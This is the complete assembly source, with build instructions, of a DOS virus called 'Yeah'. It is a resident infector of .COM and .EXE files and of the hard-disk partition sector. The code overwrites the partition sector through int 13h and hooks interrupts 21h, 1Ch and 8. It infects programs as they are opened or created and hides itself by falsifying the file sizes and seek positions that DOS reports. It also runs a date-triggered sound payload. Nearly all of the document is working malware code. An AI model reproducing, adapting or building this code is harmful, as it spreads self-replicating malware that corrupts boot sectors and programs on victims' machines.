;------------------------------------------------------------------------------ ; ; Virus Name: Yeah ; Origin: Holland ; Eff Length: 4,096 bytes ; Type Code: PRhE - Parasitic Resident .EXE & partition table infector ; ;------------------------------------------------------------------------------ ; ; This program is assembled with TASM V1.01 from Borland International ; (assembing with MASM V5.10 from Microsoft Inc. is also possible). ; ; TASM stealth; ; LINK stealth,,stealth; ; ;------------------------------------------------------------------------------ ; ; Interrupt vectors ; ;------------------------------------------------------------------------------ iseg segment at 0 org 8*4 Int8o dw 0 ; interrupt vector 21h Int8s dw 0 org 1ch*4 Int1Co dw 0 ; interrupt vector 21h Int1Cs dw 0 org 21h*4 Int21o dw 0 ; interrupt vector 21h Int21s dw 0 iseg ends cseg segment public 'code' assume cs:cseg,ds:cseg,es:cseg ;------------------------------------------------------------------------------ ; ; Header of EXE-file ; ;------------------------------------------------------------------------------ VirusSize equ 10d0h ; size of virus PrgSize equ 72h ; size of prg after the virus Signature dw 0 ; signature 'MZ' PartPage dw 0 ; size of partitial page PageCount dw 0 ; number of pages ReloCount dw 0 ; number of relocation items HeaderSize dw 0 ; size of header MinMem dw 0 ; minimum memory needed MaxMem dw 0 ; maximum memory needed ExeSS dw 0 ; initial SS ExeSP dw 0 ; initial SP CheckSum dw 0 ; unused ??? ExeIP dw 0 ; initial IP ExeCS dw 0 ; initial CS ReloOffset dw 0 ; offset of relocationtable OverlayNr dw 0 ; number of overlay ComSize dw -1 ; Size of com-file (-1 for exe) ;------------------------------------------------------------------------------ ; ; This procedure is called when starting from an exe-file ; ;------------------------------------------------------------------------------ Main: pushf ; save flags sub sp,4 ; reserve space far cs:ip push ax ; save other registers push ds push es sti ; enable interrupts cmp cs:ComSize,-1 ; com or exe-file je ExeFile ; -1 : exe-file ComFile: mov word ptr ds:[6],0fef0h ; set availeble memory to max mov bp,sp ; set cs:ip on stack for mov word ptr [bp+8],ds ; returning to the orginal mov word ptr [bp+6],100h ; program mov bp,ds ; bp : stacksegment mov ax,cs ; bx : begin of com-file add ax,(VirusSize/10h) mov bx,ax mov cx,0ff0h ; cx : size of data to move add ax,cx ; es : buffer for mover and mov es,ax ; infecting the bootsect. push cs ; ds : codesegment pop ds jmp short InfectBoot ; infect bootsector ExeFile: mov dx,cs ; Relocation add dx,(VirusSize/10h) mov ds,dx mov cx,ReloCount ; number of relocation items add dx,HeaderSize ; size of exe-header mov si,ReloOffset ; offset of 1st relocation item jcxz NoRelo NextRelo: lodsw ; offset mov di,ax lodsw ; segment add ax,dx mov es,ax mov ax,cs ; relocation factor add es:[di],ax loop NextRelo ; next relocation item NoRelo: mov bp,sp mov ax,cs ; set cs:ip on stack for add ax,ExeCS ; returning to the orginal mov [bp+8],ax ; program mov ax,ExeIP mov [bp+6],ax mov bp,cs ; bp : stacksegment add bp,ExeSS mov ax,PageCount ; calculate size of exe-file mov dx,PartPage ; in paragraphs add dx,-1 sbb ax,0 mov cl,4 shr dx,cl inc dx inc cl shl ax,cl add dx,ax add dx,MinMem ; dx : size of exe-file mov cx,dx ; cx : size of code and data sub cx,HeaderSize mov bx,cs ; bx : start of code and data mov ds,bx add bx,(VirusSize/10h) add bx,dx mov es,bx ; es : buffer for mover and sub bx,cx ; infecting the bootsect. InfectBoot: push bx ; save bx and cx push cx mov ax,201h ; read bootsector from disk xor bx,bx mov cx,1 mov dx,80h int 13h jc BootOk ; error ? mov si,offset BootSector ; compare with infected code xor di,di mov cx,1*BootSize cld repe cmpsb je BootOk ; equal ? mov di,1beh+8 ; check partitions, we don't mov cx,4 ; want to overwrite them NextPartition: cmp word ptr es:[di+2],0 ja SectOk cmp word ptr es:[di],(VirusSize+1ffh)/200h+1 ja SectOk cmp word ptr es:[di],0 ja BootOk SectOk: add di,10h loop NextPartition mov si,offset BootSector ; exchange code from bootsector xor di,di ; with viral code mov cx,1*BootSize cld call Swapsb push es ; write virus to disk pop ds push cs pop es mov ax,(VirusSize+1ffh)/200h+300h mov cx,2 int 13h push ds pop es push cs pop ds jc BootOk ; error ? mov ax,301h ; write bootsector to disk mov cx,1 int 13h BootOk: pop cx ; restore bx and cx pop bx mov dx,cs ; dx = destenation segment xor di,di push es ; push seg:ofs of mover push di push cx ; save cx mov cx,1*MoverSize mov si,offset Mover cld ; copy mover-procedure rep movsb pop cx ; restore cx cli ; disable interrupts retf ; jump to mover Mover: mov ax,cx ; save cx mov ds,bx ; ds:si = source mov es,dx ; es:di = destenation xor si,si xor di,di mov cx,8h ; copy one paragraph rep movsw inc bx inc dx mov cx,ax ; restore cx loop Mover ; next paragraph mov ss,bp ; ss = new stacksegment sti ; enable interrupts pop es ; restore registers pop ds pop ax iret ; jump to program MoverSize equ ($-Mover) ;------------------------------------------------------------------------------ ; ; Bootsector startup ; ;------------------------------------------------------------------------------ Bootsector: cli ; disable interrupts xor bx,bx ; setup stack and ds mov ds,bx mov ss,bx mov sp,7c00h sti ; enable interrupts mov ax,ds:[413h] ; get size of base memory sub ax,(VirusSize+3ffh)/400h; subtract virussize mov ds:[413h],ax ; store new memory size mov cl,6 ; calculate segment shl ax,cl mov es,ax ; load virus in reserved mem mov ax,(VirusSize+1ffh)/200h+200h mov cx,2 mov dx,80h int 13h mov bx,offset StartUp ; bx=offset startup push es ; jump to startup (es:bx) push bx retf BootSize equ ($-Bootsector) ; size of bootsector part StartUp: cli ; disable interrupts mov ax,offset Interrupt1C ; hack interrupt 1C xchg ax,ds:Int1Co mov cs:OldInt1Co,ax mov ax,cs xchg ax,ds:Int1Cs mov cs:OldInt1Cs,ax mov cs:OldInt21o,-1 mov cs:OldInt21s,-1 mov cs:Count,-1 sti ; enable interrupts push cs ; ds=cs pop es mov si,7c00h ; di=7c00h (Bootsector) mov di,offset BootSector ; si=BootSector mov cx,1*BootSize ; bytes to copy cld ; copy forward call Swapsb ; restore orginal boot mov ax,7c00h ; offset bootsector push ds ; jump to bootsector push ax retf Interrupt8: push ax ; save registers push si push ds push cs pop ds mov si,SampleOffset ; get offset of next bit dec byte ptr ds:SampleBit test byte ptr ds:SampleBit,7 jnz OfsOk inc si cmp si,offset SampleEnd ; end of sample ? jb OfsOk ; no, play bit mov al,34h ; reset int 8 frequency out 43h,al xor ax,ax out 40h,al out 40h,al mov ds,ax ; reset int 8 vector mov ax,cs:OldInt8o mov ds:Int8o,ax mov ax,cs:OldInt8s mov ds:Int8s,ax inc byte ptr cs:SampleFlag ; set sample ready flag jmp short ExitInt8 ; end of interrupt OfsOk: mov SampleOffset,si ; store offset rol byte ptr ds:[si],1 ; next bit mov ah,ds:[si] ; get bit value and ah,1 shl ah,1 in al,61h ; get value of io-port 61h and al,0fch ; reset last 2 bits or al,ah ; set bit 2 with sample value out 61h,al ; write to io-port 61h ExitInt8: mov al,20h ; end of interrupt signal out 20h,al pop ds ; restore registers pop si pop ax iret ; return to program Interrupt1C: push ds ; save registers push ax push bx xor ax,ax ; interrupts vectors mov ds,ax mov ax,ds:Int21o cmp cs:OldInt21o,ax jne Changed mov ax,ds:Int21s cmp cs:OldInt21s,ax je Equal Changed: mov ax,ds:Int21o mov cs:OldInt21o,ax mov ax,ds:Int21s mov cs:OldInt21s,ax mov cs:Count,182 jmp short NotReady Equal: dec cs:Count jnz NotReady mov ax,cs:OldInt1Co ; restore vector 1C mov ds:Int1Co,ax ; (This interrupt) mov ax,cs:OldInt1Cs mov ds:Int1Cs,ax mov ax,offset Interrupt21 ; Hack interrupt 21 xchg ax,ds:Int21o mov cs:OldInt21o,ax mov ax,cs xchg ax,ds:Int21s mov cs:OldInt21s,ax mov ax,8 mov bx,offset Handle NextHandle: mov word ptr cs:[bx],0 inc bx inc bx dec ax jnz NextHandle mov byte ptr cs:Active,-1 NotReady: pop bx pop ax ; restore registers pop ds jmp cs:OldInt1C ; do orginal int 1C Swapsb: mov al,es:[di] ; exchange two memory bytes xchg al,ds:[si] stosb inc si loop Swapsb ; next byte ret ; return ;------------------------------------------------------------------------------ ; ; Manipilated functions ; ;------------------------------------------------------------------------------ Functions db 11h ; 1 dw offset FindFCB db 12h ; 2 dw offset FindFCB db 30h ; 3 dw offset DosVersion db 3ch ; 4 dw offset Open db 3dh ; 5 dw offset Open db 3eh ; 6 dw offset Close db 42h ; 7 dw offset Seek db 45h ; 8 dw offset Duplicate db 46h ; 9 dw offset Redirect db 4eh ; 10 dw offset Find db 4fh ; 11 dw offset Find db 5bh ; 12 dw offset Open db 6ch ; 13 dw offset OpenCreate FunctionCount equ 13 ;------------------------------------------------------------------------------ ; ; The orginal interrupt 21h is redirected to this procedure ; ;------------------------------------------------------------------------------ DosVersion: push ax push cx push dx push ds push cs pop ds cmp cs:Active,0 je NotActive mov ah,2ah call DOS cmp ActiveYear,cx jb NotActive cmp ActiveDate,dx jb NotActive cli xor ax,ax mov ds,ax mov ax,offset Interrupt8 xchg ax,ds:Int8o mov cs:OldInt8o,ax mov ax,cs xchg ax,ds:Int8s mov cs:OldInt8s,ax mov al,34h out 43h,al mov al,80h out 40h,al mov al,0 out 40h,al push cs pop ds mov byte ptr SampleFlag,0 mov byte ptr SampleBit,0 mov word ptr SampleOffset,offset SampleData sti Delay: cmp byte ptr SampleFlag,0 je Delay mov byte ptr Active,0 NotActive: pop ds pop dx pop cx pop ax jmp Old21 FindFCB: call DOS ; call orginal interrupt cmp al,0 ; error ? jne Ret1 pushf ; save registers push ax push bx push es mov ah,2fh ; get DTA call DOS cmp byte ptr es:[bx],-1 ; extended fcb ? jne FCBOk add bx,8 ; yes, skip 8 bytes FCBOk: mov al,es:[bx+16h] ; get file-time (low byte) and al,1fh ; seconds cmp al,1fh ; 62 seconds ? jne FileOk ; no, file not infected sub word ptr es:[bx+1ch],VirusSize sbb word ptr es:[bx+1eh],0 ; adjust file-size jmp short Time Find: call DOS ; call orginal interrupt jc Ret1 ; error ? pushf ; save registers push ax push bx push es mov ah,2fh call DOS mov al,es:[bx+16h] ; get file-time (low byte) and al,1fh ; seconds cmp al,1fh ; 62 seconds ? jne FileOk ; no, file not infected sub word ptr es:[bx+1ah],VirusSize sbb word ptr es:[bx+1ch],0 ; change file-size Time: xor byte ptr es:[bx+16h],1fh; adjust file-time FileOk: pop es ; restore registers pop bx pop ax popf Ret1: retf 2 ; return Seek: or bx,bx ; bx=0 ? jz Old21 ; yes, do orginal interrupt push bx call FindHandle pop bx jc Old21 Stealth: or al,al ; seek from top of file ? jnz Relative ; no, don't change cx:dx add dx,VirusSize ; change cx:dx adc cx,0 Relative: call DOS ; Execute orginal int 21h jc Ret1 ; Error ? sub ax,VirusSize ; adjust dx:ax sbb dx,0 jmp short Ret1 ; return Close: or bx,bx ; bx=0 ? je Old21 ; yes, do orginal interrupt push ax push cx push dx push si push ds push cs ; ds=cs pop ds push bx call FindHandle mov si,bx pop bx jc NotStealth mov word ptr ds:[si],0 call UpdateHeader NotStealth: pop ds ; restore registers pop si pop dx pop cx pop ax Not2: jmp short Old21 ; continue with orginal int Interrupt21: push bx ; after an int 21h instruction push cx ; this procedure is started mov bx,offset Functions mov cx,FunctionCount NxtFn: cmp ah,cs:[bx] ; search function je FunctionTrap add bx,3 loop NxtFn pop cx ; function not found pop bx Old21: jmp cs:OldInt21 FunctionTrap: push bp ; function found, start viral mov bp,sp ; version of function mov bx,cs:[bx+1] xchg bx,[bp+4] mov cx,[bp+10] xchg cx,[bp+2] pop bp popf ret Duplicate: call DOS jc Error pushf push bx call FindHandle jc Ret3 mov bx,ax call StoreHandle Ret3: pop bx popf jmp Ret2 Redirect: call DOS jc Error pushf push bx push cx xchg bx,cx call FindHandle jc Ret4 mov cs:[bx],cx Ret4: pop cx pop bx popf jmp Ret2 OpenCreate: or al,al ; extended open/create function jne Old21 ; no, do orginal interrupt 21 push dx ; save dx mov dx,si ; check extension of filename call CheckName pop dx ; retore dx jc Old21 ; exe or com-file? jmp short ExtensionOk ; yes, infect file or use ; stealth Open: call CheckName ; exe or com-file ? jc Old21 ; no, do orginal int 21 ExtensionOk: call DOS ; do interrupt 21 jnc NoError ; error ? Error: jmp Ret2 ; yes, return and do nothing NoError: pushf ; save registers push ax push bx push cx push dx push ds push cs pop ds mov bx,ax ; bx = file handle mov ax,4400h ; get device information call DOS jc PopRet ; error ? test dx,80h ; character device jnz PopRet ; yes, return and do nothing call EndOfFile ; get file size or ax,dx ; 0 ? jnz FileExists ; no, file already existed FileCreated: call HandleFree jc PopRet mov ah,2ah call DOS add dh,3 cmp dh,12 jbe DateOk inc cx sub dh,12 DateOk: mov ActiveYear,cx mov ActiveDate,dx mov ah,40h ; write virus to file mov cx,VirusSize call Zero2 jc NoVir ; error ? yes, return xor ax,cx ; entire virus written ? jnz NoVir ; no, return call StoreHandle jmp short PopRet ; return FileExists: call TopOfFile ; go to top of file call HandleFree jc PopRet ; no, do nothing call ReadHeader ; read exe-header jc NoVir ; error ? xor ax,cx ; entire header read jne NoVir ; no, not infected cmp Signature,5a4dh ; signature = 'MZ' ? jne NoVir ; no, not infected cmp HeaderSize,ax ; headersize = 0 ? jne NoVir ; no, not infected cmp CheckSum,0DEADh ; checksum = DEAD hex jne NoVir ; no, not infected call StoreHandle mov dx,VirusSize ; seek to end of virus jmp short Infected NoVir: xor dx,dx Infected: xor cx,cx ; go to end of virus if file mov ax,4200h ; is infected call DOS PopRet: pop ds ; restore registers pop dx pop cx pop bx pop ax popf Ret2: retf 2 ; return ;------------------------------------------------------------------------------ EndOfFile: mov ax,4202h ; go to end of file jmp short Zero1 TopOfFile: mov ax,4200h ; go to top of file Zero1: xor cx,cx jmp short Zero2 WriteHeader: mov ah,40h ; write exe-header to file jmp short Hdr ReadHeader: mov ah,3fh ; read exe-header from file Hdr: mov cx,1eh Zero2: xor dx,dx DOS: pushf ; call orginal interrupt call cs:OldInt21 ret FindHandle: push ax push cx mov ax,bx mov bx,offset Handle mov cx,8 NotFound: cmp ax,cs:[bx] je Found inc bx inc bx loop NotFound stc Found: pop cx pop ax ret HandleFree: push bx xor bx,bx call FindHandle pop bx ret StoreHandle: push bx push bx xor bx,bx call FindHandle pop cs:[bx] pop bx ret CheckName: push ax ; check for .exe or .com push cx ; save registers push si push di xor ah,ah ; point found = 0 mov cx,100h ; max length filename = 100h mov si,dx ; si = start of filename cld NxtChr: lodsb ; get byte or al,al ; 0 ? je EndName ; yes, check extension cmp al,'\' ; \ ? je Slash ; yes, point found = 0 cmp al,'.' ; . ? je Point ; yes, point found = 1 loop NxtChr ; next character jmp short EndName ; check extension Slash: xor ah,ah ; point found = 0 jmp NxtChr ; next character Point: inc ah ; point found = 1 mov di,si ; di = start of extension jmp NxtChr ; next character EndName: cmp ah,1 ; point found = 0 jne NotExe ; yes, not an exe-file mov si,di ; si = start of extension lodsw ; first 2 characters and ax,0dfdfh ; uppercase mov cx,ax lodsb ; 3rd character and al,0dfh ; uppercase cmp cx,04f43h ; extension = .com ? jne NotCom cmp al,04dh je ChkRet NotCom: cmp cx,05845h ; extension = .exe ? jne NotExe cmp al,045h je ChkRet NotExe: stc ; set carry flag ChkRet: pop di ; restore registers pop si pop cx pop ax ret ; return UpdateHeader: mov ax,4200h ; position read/write pointer xor cx,cx ; at the end of the virus mov dx,VirusSize call DOS call ReadHeader ; read orginal exe-header cmp Signature,5a4dh je InfectExe InfectCom: mov Signature,5a4dh mov ReloOffset,01ch mov OverlayNr,0 mov ExeSS,(VirusSize-100h)/10h mov ExeSP,0fffeh call EndOfFile sub ax,VirusSize sbb dx,0 mov ComSize,ax mov cx,10h div cx sub dx,1 mov dx,0ff2h+20h sbb dx,ax mov MinMem,dx jmp WriteIt InfectExe: mov ComSize,-1 mov ax,(VirusSize/10h) add ax,HeaderSize add ExeSS,ax add MinMem,20h add MaxMem,20h jnc MaxOk WriteIt: mov MaxMem,0ffffh MaxOk: mov ReloCount,0 mov HeaderSize,0 mov CheckSum,0DEADh mov ExeCS,0 mov ExeIP,offset Main call EndOfFile mov cx,200h div cx mov PartPage,dx add dx,-1 adc ax,0 mov PageCount,ax call TopOfFile call WriteHeader ; write header at the top of jc InfErr ; the virus mov ax,5700h call DOS mov ax,5701h or cl,1fh call DOS InfErr: ret ;------------------------------------------------------------------------------ ; ; Data to generate the 123 yeah sound ; ;------------------------------------------------------------------------------ SampleData db 07dh,075h,05fh,0ffh,0ffh,0ffh,0ffh,0a0h,03fh,007h,0f8h,03ch,007h,0e0h,07fh,003h db 0c0h,0f8h,00fh,0c0h,0f0h,07ch,00fh,0c0h,0f8h,0f0h,01fh,081h,0ffh,081h,0fch,00ch db 07eh,007h,0f0h,071h,0f0h,03fh,007h,00fh,083h,0f0h,071h,0f8h,03fh,007h,01fh,003h db 0e0h,0e3h,0e0h,07ch,000h,0fch,00fh,080h,03fh,003h,0e0h,01fh,0c0h,0fch,007h,0f0h db 03fh,003h,0f8h,00fh,0c0h,0feh,003h,0f0h,07fh,001h,0f8h,03fh,0c0h,07eh,007h,0fch db 03fh,001h,0f8h,01eh,01fh,002h,03eh,00fh,0c0h,03fh,007h,0f0h,01fh,007h,0fch,00fh db 082h,0ffh,00fh,086h,00fh,038h,03eh,004h,03ch,01fh,008h,03eh,01fh,008h,03eh,00fh db 000h,07ch,00fh,080h,07ch,007h,0e0h,078h,0e1h,0f0h,0f0h,0e1h,0f0h,0f0h,0f0h,0f1h db 0e1h,0f0h,0e1h,0e1h,0f0h,0e3h,0c3h,0f0h,0cfh,007h,0f0h,01eh,00fh,0f0h,03eh,01eh db 078h,03ch,01ch,078h,038h,03ch,078h,078h,07ch,070h,0f0h,078h,0e1h,0c0h,070h,0c3h db 058h,061h,08eh,078h,0e3h,01ch,071h,0c6h,03ch,0e3h,08eh,030h,0e7h,01ch,071h,0c6h db 038h,0e1h,08eh,038h,0e3h,09ch,071h,0c7h,01ch,0f1h,0c7h,018h,0e3h,007h,038h,0e7h db 00fh,000h,0efh,00fh,001h,0e6h,00fh,0c1h,0e3h,01eh,003h,0e3h,08eh,0e1h,0dfh,087h db 0e1h,0c3h,0c6h,070h,07fh,003h,0f0h,073h,0f0h,03eh,007h,0ech,007h,0e0h,078h,070h db 07eh,00fh,00fh,007h,0c2h,063h,0e0h,07eh,008h,0f8h,01fh,080h,03eh,003h,0f0h,01fh db 080h,0fch,007h,0f0h,03fh,001h,0f8h,00fh,0c0h,0feh,003h,0f0h,01fh,0c0h,0f8h,01fh db 0e0h,07ch,01fh,0f0h,03eh,00fh,080h,01fh,00fh,0f0h,01fh,007h,0d0h,00fh,007h,0c3h db 00fh,007h,082h,00fh,007h,0c0h,00fh,007h,0c3h,00fh,007h,080h,00fh,007h,00ah,01fh db 00fh,08eh,01eh,01eh,00eh,03ch,01eh,01ch,03ch,03ch,018h,078h,07ch,018h,0f0h,078h db 0f1h,0f0h,0f0h,0e1h,0e1h,0e0h,0c3h,0c3h,0e1h,0c7h,083h,0c3h,08fh,00fh,003h,01eh db 01eh,00eh,01ch,03eh,01ch,078h,078h,038h,0f0h,0f0h,031h,0e1h,0ech,063h,0c3h,0c8h db 0c7h,087h,0f1h,08fh,00ch,0e3h,01eh,01bh,0c7h,01ch,027h,08eh,038h,047h,01ch,079h db 08eh,038h,071h,01eh,038h,0f2h,01ch,070h,0d6h,038h,0f1h,0c0h,038h,0f1h,0e0h,078h db 001h,0e4h,07dh,0f0h,0e0h,018h,018h,0f6h,03ch,088h,070h,01fh,0ech,078h,006h,004h db 03fh,087h,0f2h,01ch,083h,0fbh,01fh,0e1h,0f8h,007h,0f0h,0ffh,0c3h,0f8h,003h,0c0h db 0ffh,001h,0f8h,007h,080h,03fh,001h,0e0h,00ch,086h,07ch,063h,0c0h,01fh,060h,0fch db 023h,080h,038h,003h,0e0h,038h,0c0h,018h,0c7h,0f8h,0c7h,000h,000h,001h,0c7h,0b8h db 060h,008h,006h,01fh,0c7h,018h,002h,030h,00eh,03ch,01ch,000h,000h,001h,0f8h,01ch db 001h,087h,081h,0e1h,080h,0cch,006h,000h,0c6h,060h,000h,008h,007h,080h,000h,020h db 0e2h,000h,000h,020h,008h,008h,063h,0ech,004h,023h,024h,062h,08ch,0abh,052h,02dh db 0a8h,004h,09bh,034h,0a5h,0c6h,092h,0b4h,0a6h,099h,012h,0c1h,09dh,0a0h,02ch,0dbh db 034h,0cdh,0a8h,044h,098h,0f6h,024h,003h,07fh,0a0h,040h,01bh,0feh,000h,00bh,0ffh db 080h,001h,0ffh,0c0h,000h,0ffh,0f0h,000h,07fh,0f8h,000h,03fh,0f8h,000h,03fh,0f0h db 000h,03fh,0f8h,000h,03fh,0f0h,000h,07fh,0c0h,003h,0ffh,0c0h,003h,0ffh,000h,005h db 0feh,04eh,01dh,0e0h,031h,0ffh,000h,0c7h,0feh,000h,01fh,0feh,000h,03fh,0feh,000h db 03fh,0ffh,080h,03fh,0ffh,000h,047h,0f9h,082h,007h,0e7h,08ch,00fh,09fh,070h,03eh db 07fh,0c0h,071h,0bfh,000h,0e7h,07ch,003h,09fh,0f8h,00eh,03fh,0e0h,018h,0f7h,0c0h db 073h,0ffh,001h,0c7h,0fch,003h,00eh,0f8h,00eh,03fh,0e0h,018h,06fh,0c0h,070h,09fh db 080h,0e3h,07eh,003h,0c6h,0fch,007h,083h,0f8h,00eh,007h,0f0h,01ch,06fh,0c0h,078h db 01fh,0c0h,0f1h,07fh,001h,0e0h,0ffh,003h,0c1h,0feh,003h,083h,0fch,007h,007h,0f8h db 00fh,00fh,078h,00eh,00eh,0f8h,01eh,01eh,0f0h,01eh,03ch,0f0h,01ch,03dh,0e1h,05ch db 039h,0e1h,018h,07bh,0c2h,038h,073h,0c3h,038h,0f3h,086h,038h,0e7h,086h,070h,0e3h db 086h,070h,0e3h,084h,070h,0e3h,086h,070h,0e7h,08ch,070h,0e7h,08eh,070h,0e3h,086h db 071h,0c3h,086h,078h,0e3h,080h,079h,0e3h,082h,038h,0f1h,0c3h,01ch,0f9h,0c3h,01ch db 078h,0c1h,01eh,078h,0e1h,08fh,03ch,070h,08fh,03ch,030h,067h,08eh,038h,073h,086h db 018h,07bh,087h,08eh,03ch,0e3h,08fh,038h,060h,0e7h,08ch,038h,0f3h,087h,00eh,078h db 0c3h,01eh,070h,070h,0e7h,086h,021h,0e7h,007h,08ch,078h,00eh,03eh,0e0h,0f1h,0cfh db 000h,0f1h,0e7h,007h,01ch,078h,0c7h,01eh,078h,070h,0c7h,08eh,030h,067h,0c7h,08eh db 018h,0f3h,007h,070h,07ch,079h,0c1h,019h,033h,004h,0e3h,0cfh,003h,087h,03ch,070h db 0f1h,0c7h,00eh,03ch,0f1h,0e1h,087h,09ch,038h,061h,0e7h,08fh,01ch,03fh,087h,03ch db 00fh,0f3h,0c3h,086h,03ch,0f0h,018h,05fh,03eh,030h,0f1h,087h,0c6h,00fh,0f0h,0e3h db 0c7h,01fh,00eh,03ch,071h,087h,08eh,01fh,018h,079h,0c3h,08fh,01ch,01eh,018h,0f1h db 0e0h,007h,0cch,01eh,038h,071h,0e0h,0c7h,0c6h,01ch,07ch,0e0h,01ch,078h,07fh,010h db 07fh,0e0h,018h,0e1h,0cfh,018h,0e1h,0c0h,038h,0e7h,0c0h,01ch,079h,087h,038h,023h db 0ech,018h,0f1h,082h,078h,003h,0c6h,018h,07bh,0c1h,0f8h,001h,0cfh,018h,079h,0c1h db 00eh,038h,073h,0ddh,019h,0f1h,007h,03ch,070h,0e7h,008h,078h,0c3h,00eh,078h,023h db 08eh,018h,073h,0c7h,09eh,030h,0c3h,08eh,018h,0f1h,0c7h,00ch,070h,0e3h,08eh,03ch db 071h,0c3h,01ch,038h,0e1h,08fh,01ch,070h,0c7h,08eh,038h,061h,0c7h,01eh,038h,0e1h db 08fh,01ch,071h,0e7h,08ch,038h,0e3h,0c6h,01ch,078h,0e1h,00eh,01ch,078h,0c7h,08eh db 03ch,031h,0c3h,08fh,028h,070h,0e3h,086h,01ch,038h,0f1h,087h,00eh,038h,071h,0c3h db 08fh,01ch,078h,0e1h,0c3h,00eh,01ch,078h,0e1h,0c3h,08eh,01ch,078h,071h,0c1h,08fh db 08fh,0f8h,03dh,0f8h,018h,007h,0feh,002h,007h,0feh,006h,003h,0ffh,083h,0c1h,0ffh db 0c1h,081h,0f7h,0d1h,0c0h,0ffh,0c0h,0c1h,0f3h,0e1h,0c1h,0f7h,0e0h,0c1h,0e3h,0e1h db 0c1h,0e3h,0c1h,0c1h,0e3h,0c3h,083h,0c7h,083h,083h,0c7h,087h,007h,08fh,086h,00fh db 09eh,01ch,01eh,01ch,03ch,01ch,03ch,038h,078h,038h,0f0h,0f8h,0e0h,0f1h,0f1h,0c1h db 0e1h,0f3h,083h,087h,0deh,006h,00fh,03eh,01ch,03ch,07ch,038h,07ch,0f8h,060h,0ffh db 0c7h,083h,087h,087h,083h,00fh,00fh,087h,01fh,01fh,007h,09fh,01eh,007h,087h,00fh db 00fh,00fh,00fh,00eh,01eh,01eh,01ch,01eh,03eh,00ch,03ch,03eh,00ch,03ch,03eh,01ch db 01ch,07ch,03ch,038h,0f8h,078h,0f0h,0f0h,0f0h,0f1h,0f1h,0c1h,0f1h,0e3h,083h,0e1h db 0c0h,047h,0c7h,0c1h,08fh,00fh,086h,01eh,00fh,018h,078h,01ch,061h,0fch,071h,08eh db 071h,0c6h,031h,0c7h,030h,0c7h,018h,0e3h,08ch,0e3h,09eh,023h,08eh,078h,00eh,039h db 0c0h,078h,07fh,0e1h,0e0h,0f9h,0c3h,080h,0f3h,00fh,003h,0cch,03ch,0cfh,010h,073h db 01eh,0e0h,0c6h,07dh,007h,001h,0fch,004h,041h,0f3h,080h,0b1h,0eeh,040h,067h,01ch db 039h,09eh,03ch,0e6h,038h,003h,09ch,063h,00eh,079h,087h,00dh,0c7h,00ch,007h,08eh db 018h,00fh,09eh,006h,01fh,01fh,00ch,03eh,03eh,006h,03ch,01ch,01ch,07eh,03ch,038h db 03eh,038h,07ch,07ch,060h,070h,079h,081h,0e0h,0e2h,063h,0c1h,0c1h,0c3h,087h,0c7h db 087h,007h,03fh,00eh,00ch,0ceh,03eh,033h,038h,078h,07ch,0e0h,0e0h,0f9h,0e3h,083h db 0f1h,085h,0cfh,0e6h,007h,01fh,098h,01ch,07eh,020h,070h,0fch,031h,099h,0d8h,0c6h db 067h,063h,01bh,09dh,08ch,00eh,07bh,030h,079h,0e0h,080h,0fbh,0cch,003h,0e7h,030h db 00fh,09ch,0c0h,03eh,033h,000h,0fch,0ceh,003h,0f3h,098h,00dh,0ceh,060h,037h,039h db 080h,0dch,0e7h,001h,073h,09ch,007h,0ceh,070h,01fh,01ch,0c0h,03eh,073h,000h,0f1h db 0cch,001h,0cfh,038h,006h,03eh,0e0h,00ch,0ffh,098h,043h,0feh,061h,00fh,0f9h,084h db 077h,0f2h,010h,08fh,0cch,003h,03fh,091h,000h,07fh,002h,013h,0fch,0c8h,047h,0fbh db 030h,00ch,0e6h,00ch,00dh,0dch,020h,099h,0b8h,0cch,013h,0e3h,038h,08dh,08ch,0e1h db 099h,03bh,0d8h,099h,0bfh,0ech,0c4h,07fh,09ch,0c8h,0ceh,07eh,004h,02fh,0f9h,000h db 027h,0f7h,020h,01bh,0ffh,0c0h,00eh,0f7h,060h,011h,0ffh,0c0h,006h,0ffh,080h,001h db 0feh,0c4h,066h,0fch,0d0h,011h,0ddh,0c4h,067h,027h,033h,0fch,0cch,046h,066h,072h db 000h,0cfh,0eeh,0c0h,00fh,077h,030h,019h,09fh,0e0h,000h,0dfh,0d8h,011h,01ch,0cch db 0cch,046h,067h,073h,011h,099h,09ch,0cch,0e6h,062h,033h,03bh,011h,08dh,0feh,0c4h db 003h,07fh,0b9h,080h,08ch,0f6h,062h,000h,03dh,0dch,000h,007h,0fbh,010h,019h,0bfh db 0e2h,046h,007h,033h,0b1h,008h,06eh,063h,031h,09fh,0f0h,000h,067h,073h,011h,099h db 0cfh,033h,030h,030h,0d9h,098h,080h,03fh,0fch,000h,04fh,0efh,073h,030h,018h,07fh db 0fch,000h,019h,0feh,000h,037h,0ffh,080h,000h,037h,08eh,0f9h,000h,003h,0ffh,080h db 006h,0ffh,0f0h,000h,01eh,0f1h,0dbh,080h,000h,037h,0f0h,000h,027h,0f3h,040h,04eh db 0e7h,000h,04fh,0c6h,000h,0dfh,0ceh,080h,09dh,0cch,001h,09fh,0c4h,000h,09fh,0fch db 001h,09fh,080h,000h,0bfh,0c8h,080h,09dh,0cch,080h,0ceh,0e4h,040h,04eh,0ffh,022h db 027h,072h,010h,013h,0bbh,098h,00dh,0dch,084h,002h,077h,062h,001h,0bbh,0b0h,080h db 04eh,0ech,040h,01bh,0bbh,010h,006h,0eeh,042h,000h,09dh,0d8h,080h,013h,0bbh,000h db 002h,077h,062h,004h,06eh,0e4h,020h,00ch,0eeh,0c0h,000h,0cch,0ech,000h,00ch,0eeh db 0c0h,000h,06eh,0f4h,000h,006h,077h,040h,002h,033h,0feh,080h,018h,0dfh,0f0h,000h db 046h,07fh,0c0h,023h,01bh,0f6h,000h,00ch,0ffh,0d8h,010h,031h,07eh,070h,03ch,00fh db 0e0h,0f8h,01fh,081h,0f0h,03eh,007h,0c0h,0f0h,03eh,003h,003h,0f0h,038h,03fh,003h db 081h,0f0h,03ch,01fh,081h,0c1h,0f0h,01ch,00fh,081h,0e0h,0f8h,01eh,00fh,080h,0e0h db 07fh,07fh,0ffh,0ffh,0ffh,0ffh,0ffh,0feh,06ch,092h,0d9h,0a6h,0c6h,082h,0c8h,032h db 049h,000h,083h,07fh,0b0h,000h,016h,0ffh,0a0h,000h,05fh,0fdh,080h,042h,0bfh,0f0h db 082h,009h,02dh,010h,080h,099h,06bh,040h,006h,0cah,0a0h,000h,0bdh,0b4h,000h,050h db 0b4h,001h,0d1h,0a4h,081h,0d3h,046h,096h,0d6h,0a2h,049h,0dbh,040h,0b7h,0f4h,083h db 